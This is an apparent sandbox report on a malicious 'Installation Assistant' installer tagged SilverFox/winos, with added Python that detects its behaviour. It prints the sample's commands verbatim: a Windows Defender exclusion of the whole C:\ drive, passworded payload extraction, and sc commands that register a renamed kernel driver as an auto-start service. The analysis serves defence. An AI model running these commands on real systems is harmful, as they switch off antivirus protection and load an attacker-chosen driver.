Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_2.0.6.exe

Overview

General Information

Sample name: #U5b89#U88c5#U52a9#U624b_2.0.6.exe
Renamed by the sandbox: non-ASCII characters in the original file name are escaped as #Uxxxx (U+5B89 U+88C5 U+52A9 U+624B), so the name decodes to 安装助手_2.0.6.exe, Chinese for "Installation Assistant 2.0.6".
Original sample name: 安装助手_2.0.6.exe
Analysis ID:1579778
MD5:2fab10855efc0dc62a255ff1e6ec8fa6
SHA1:0d69a4ea968d50370ee5f7d6e78252f5f61b75f5
SHA256:869de4431ad5ea6b7513c3e12ff32ecd8b0e93e33c5ab6e3de7bf90de55edc23
Tags: exe, SilverFox, winos, user-kafan_shengui

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

(classification chart not reproduced in this extract)

Process Tree

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b_2.0.6.exe (PID: 5596 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" MD5: 2FAB10855EFC0DC62A255FF1E6EC8FA6)
    • #U5b89#U88c5#U52a9#U624b_2.0.6.tmp (PID: 2452 cmdline: "C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20420,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" MD5: 9902FA6D39184B87AED7D94A037912D8)
      • powershell.exe (PID: 5972 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 6980 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b_2.0.6.exe (PID: 1644 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT MD5: 2FAB10855EFC0DC62A255FF1E6EC8FA6)
        • #U5b89#U88c5#U52a9#U624b_2.0.6.tmp (PID: 5436 cmdline: "C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$3043C,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT MD5: 9902FA6D39184B87AED7D94A037912D8)
          • 7zr.exe (PID: 6536 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 6352 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5752 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2140 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2696 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1088 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7064 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1784 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5808 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6632 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1848 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4796 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5996 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6512 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7120 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6536 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1988 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6844 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5696 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 180 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2260 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7056 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2300 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4832 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5808 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3200 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6544 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4796 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2296 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6584 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1632 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2520 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6196 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5624 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5972 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3228 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5712 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7064 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1088 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1272 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5332 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1848 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6528 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6552 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6648 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6180 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6592 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5624 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1816 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2292 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5712 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2636 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4308 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2796 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5636 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6544 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5596 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2296 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2020 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4180 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1440 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6156 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6048 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5632 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
No configs have been found
No yara matches

System Summary

Source: Process started; rule authors: Florian Roth (Nextron Systems); Florian Roth (Nextron Systems); Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements). Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20420,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe", ParentImage: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp, ParentProcessId: 2452, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 5972, ProcessName: powershell.exe
Source: Process started; rule authors: Nasreddine Bencherchali (Nextron Systems); Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community. Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5752, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 2140, ProcessName: sc.exe
Note: three process-creation rules matched the Defender exclusion and two matched the service creation. An exclusion path of C:\ applies recursively, so every file the installer subsequently drops under C:\ (including the 7zr.exe payload extraction under "C:\Program Files (x86)\Windows NT") is outside Defender's real-time scanning from that point on.
No Suricata rule has matched
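The Sigma hits above fire on single events; the process tree also shows something per-event rules miss, namely the CleverSoar service being started roughly thirty times through fresh cmd /c start wrappers, which is what a driver that refuses to load looks like when the installer retries in a loop. The following Python is an added example, not part of the Joe Sandbox report or of any Sigma rule: it parses a few lines copied from the tree (the TREE string is that constructed sample, in the report's own format), rebuilds parent/child links from the indentation, and applies the same logic as the three rules plus a retry counter. The rule names, the burst threshold of three and the extra check for a kernel binPath that does not end in .sys are this example's own choices.

```python
"""Sigma-style detections replayed over Joe Sandbox process-tree lines.

Added example, not from the report. TREE is a constructed sample in the
report's tree format; parse_tree() recovers parent links from indentation,
and the rules mirror the Sigma hits (Defender exclusion, kernel driver via
sc.exe) plus a retry counter for 'sc start'. Thresholds are illustrative.
"""
import re
from collections import Counter

TREE = r"""
• #U5b89#U88c5#U52a9#U624b_2.0.6.tmp (PID: 2452 cmdline: "C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20420,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" MD5: 9902FA6D39184B87AED7D94A037912D8)
  • powershell.exe (PID: 5972 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
• cmd.exe (PID: 5752 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • sc.exe (PID: 2140 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
• cmd.exe (PID: 2696 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • sc.exe (PID: 1088 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
• cmd.exe (PID: 7064 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • sc.exe (PID: 1784 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
• cmd.exe (PID: 5808 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • sc.exe (PID: 6632 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
"""

# One tree line: <indent>• <image> (PID: <n> cmdline: <cmd> MD5: <hash>)
LINE_RE = re.compile(
    r"^(?P<indent>[ ]*)•\s+(?P<image>.+?)\s+\(PID:\s+(?P<pid>\d+)\s+cmdline:\s+"
    r"(?P<cmd>.*)\s+MD5:\s+(?P<md5>[0-9A-Fa-f]{32})\)\s*$"
)
# sc.exe 'key= value' options; the value may be a quoted path with spaces
SC_OPT_RE = re.compile(r"(\w+)=\s*(\"[^\"]*\"|\S+)")


def parse_tree(text):
    """Flatten tree lines into process-creation events; two spaces = one level."""
    events, ancestors = [], []          # ancestors: [(depth, event), ...]
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        depth = len(m.group("indent")) // 2
        while ancestors and ancestors[-1][0] >= depth:
            ancestors.pop()
        parent = ancestors[-1][1] if ancestors else None
        ev = {
            "Image": m.group("image"),
            "CommandLine": m.group("cmd"),
            "ProcessId": int(m.group("pid")),
            "MD5": m.group("md5").lower(),
            "ParentImage": parent["Image"] if parent else None,
            "ParentCommandLine": parent["CommandLine"] if parent else None,
        }
        events.append(ev)
        ancestors.append((depth, ev))
    return events


def rule_defender_exclusion(ev):
    """Add-MpPreference with an -Exclusion* switch; a drive root is the worst case."""
    if not ev["Image"].lower().endswith("powershell.exe"):
        return None
    low = ev["CommandLine"].lower()
    if "add-mppreference" not in low or "-exclusion" not in low:
        return None
    m = re.search(r"-ExclusionPath\s+['\"]?([A-Za-z]:\\[^'\"]*)", ev["CommandLine"], re.I)
    path = m.group(1) if m else None
    return {"rule": "defender_exclusion", "pid": ev["ProcessId"], "parent": ev["ParentImage"],
            "path": path,
            "drive_root": bool(path) and re.fullmatch(r"[A-Za-z]:\\", path) is not None}


def rule_kernel_driver_via_sc(ev):
    """'sc create <name> ... type= kernel'; also flag a binPath that is not a .sys."""
    if not ev["Image"].lower().endswith("sc.exe"):
        return None
    m = re.search(r"\bcreate\s+(\S+)", ev["CommandLine"], re.I)
    if not m:
        return None
    opts = {k.lower(): v.strip('"') for k, v in SC_OPT_RE.findall(ev["CommandLine"])}
    if opts.get("type", "").lower() != "kernel":
        return None
    binpath = opts.get("binpath", "")
    return {"rule": "kernel_driver_via_sc", "pid": ev["ProcessId"], "service": m.group(1),
            "binpath": binpath, "start": opts.get("start"),
            "non_sys_extension": not binpath.lower().endswith(".sys")}


def rule_sc_start_burst(events, threshold=3):
    """Repeated 'sc start <service>' across the trace: a service that will not start."""
    counts = Counter()
    for ev in events:
        if ev["Image"].lower().endswith("sc.exe"):
            m = re.match(r"\s*sc(?:\.exe)?\s+start\s+(\S+)", ev["CommandLine"], re.I)
            if m:
                counts[m.group(1)] += 1
    return [{"rule": "sc_start_burst", "service": s, "attempts": n}
            for s, n in counts.items() if n >= threshold]


def run_detections(text, burst_threshold=3):
    events = parse_tree(text)
    hits = [h for ev in events
            for h in (rule_defender_exclusion(ev), rule_kernel_driver_via_sc(ev)) if h]
    hits.extend(rule_sc_start_burst(events, burst_threshold))
    return hits


if __name__ == "__main__":
    for hit in run_detections(TREE):
        print(hit)
```

The same three functions run unchanged over Sysmon Event ID 1 or Security 4688 records once they are mapped to the Image/CommandLine/ParentImage fields the Sigma rules use; the tree parser is only there so the example runs against the text of this report.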

AV Detection

Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe; Virustotal: Detection: 6%
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb; source: 7zr.exe, 0000000D.00000003.2195342849.0000000003BD0000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000D.00000003.2196177862.0000000001250000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.13.dr
Note: tProtect.dll is the file the process tree registers as the CleverSoar kernel service (sc create ... binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel). Its PDB path names TfSysMon and an objfre_wnet_amd64 target (the WDK free build for Windows Server 2003 x64), so the ".dll" is a pre-existing 64-bit kernel driver from a third-party product (the name and build path match the PC Tools ThreatFire system monitor, TfSysMon.sys) that has been renamed, not code written under the CleverSoar name. Which driver it is, and whether its signature is still valid, is the first thing to check on the dropped file.
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp; Code function: 7_2_6C0BAEC0 FindFirstFileA,FindClose,7_2_6C0BAEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 11_2_00566868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,11_2_00566868
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 11_2_00567496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,11_2_00567496
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.dr; Strings found in binary or memory (AIA, CRL and OCSP URLs from the DigiCert certificate chains in the components' Authenticode data; the report lists them as string hits, not as observed connections):
  • http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
  • http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
  • http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
  • http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
  • http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
  • http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
  • http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
  • http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
  • http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
  • http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
  • http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
  • http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
  • http://ocsp.digicert.com0A
  • http://ocsp.digicert.com0C
  • http://ocsp.digicert.com0H
  • http://ocsp.digicert.com0I
  • http://ocsp.digicert.com0X
  • http://www.digicert.com/CPS0
  • http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.dr; Strings found in binary or memory (aria2 usage text, so is-8UMQQ.tmp is a bundled copy of the aria2 downloader):
  • http://www.metalinker.org/
